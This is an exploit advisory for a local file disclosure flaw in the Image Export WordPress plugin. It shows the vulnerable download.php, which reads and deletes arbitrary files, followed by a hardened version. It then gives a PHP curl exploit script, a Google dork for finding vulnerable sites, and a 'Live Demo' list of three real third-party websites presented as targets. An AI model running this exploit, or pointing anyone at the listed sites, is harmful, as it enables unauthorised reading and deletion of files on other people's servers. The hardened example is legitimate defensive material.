" Image Export WordPress Plugin - Local File Disclosure "
In this bug, an attacker is able to download files from the server, and immediately after the download the files are deleted from the server.
Source : https://github.com/wp-plugins/image-export
===========
Vulnerable page :
===========
image-export/download.php
==========
Vulnerable Code :
==========
<?php
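if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
    // 'file' is taken from the query string with no validation or access check
    $file = $_GET['file'];
    header( 'Content-Type: application/zip' );
    header( 'Content-Disposition: attachment; filename="' . $file . '"' );
    readfile( $file ); // sends any file the PHP process can read
    unlink( $file );   // then deletes it from the server
    exit;
}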
?>
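The same handler with the file parameter constrained, shown as an added example that is not the plugin's own code. The exports directory, the constant EXPORT_DIR and the function name resolve_export_file are assumptions made for illustration.

```php
<?php
// Added example: hardened form of the download handler shown above.
// Assumption: exports are written to a dedicated directory (EXPORT_DIR is a
// hypothetical name) that holds nothing except generated ZIP archives.
const EXPORT_DIR = __DIR__ . '/exports';

/**
 * Map a client-supplied name to a file inside $exportDir.
 * Returns the resolved path, or null when the request must be refused.
 */
function resolve_export_file( $requested, $exportDir ) {
    if ( ! is_string( $requested ) ) {
        return null; // refuses array input such as file[]=x
    }
    // Accept only a bare "<name>.zip": no slashes, no "..", no stream wrappers.
    if ( ! preg_match( '/\A[A-Za-z0-9_-]{1,64}\.zip\z/', $requested ) ) {
        return null;
    }
    $base = realpath( $exportDir );
    $path = realpath( $exportDir . '/' . $requested );
    if ( $base === false || $path === false || ! is_file( $path ) ) {
        return null;
    }
    // Containment check after symlinks are resolved.
    if ( strncmp( $path, $base . DIRECTORY_SEPARATOR, strlen( $base ) + 1 ) !== 0 ) {
        return null;
    }
    return $path;
}

if ( isset( $_GET['file'] ) ) {
    $path = resolve_export_file( $_GET['file'], EXPORT_DIR );
    if ( $path === null ) {
        http_response_code( 404 );
        exit;
    }
    header( 'Content-Type: application/zip' );
    header( 'Content-Disposition: attachment; filename="' . basename( $path ) . '"' );
    header( 'Content-Length: ' . filesize( $path ) );
    header( 'X-Content-Type-Options: nosniff' );
    readfile( $path );
    unlink( $path ); // can now only remove an archive inside EXPORT_DIR
    exit;
}
```

This limits both the read and the delete to archives in one directory. The handler still performs no access check of its own, so restricting who may request an export is a separate change.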
=========
Exploit :
=========
<?php
# Author : Shahab Shamsi
# Title : Image Export WordPress Plugin - Local File Disclosure
# Version : All Versions
# Google Dork : inurl:/wp-content/plugins/image-export/
# Date : 09.September.2016
# Email : info@securityman.org
# Vendor : https://github.com/wp-plugins/image-export
# Category : Webapps
$target = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://localhost/wp-content/plugins/image-export/download.php?file=image-export.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
/*
Contact Me :
Telegram : @R4DIK4L
Email : info@securityman.org
Website : WwW.MohitAmn.Org
Tnx : AmirHossein Farjad
Tnx : Sadegh Safaeian
Curl By : R@DIK@L
*/
?>
============
Live Demo :
============
http://www.c3inmobiliaria.es/wp-content/plugins/image-export/download.php
https://www.123ehost.com/wp-content/plugins/image-export/download.php
http://www.barankhabar.ir/wp-content/plugins/image-export-master/download.php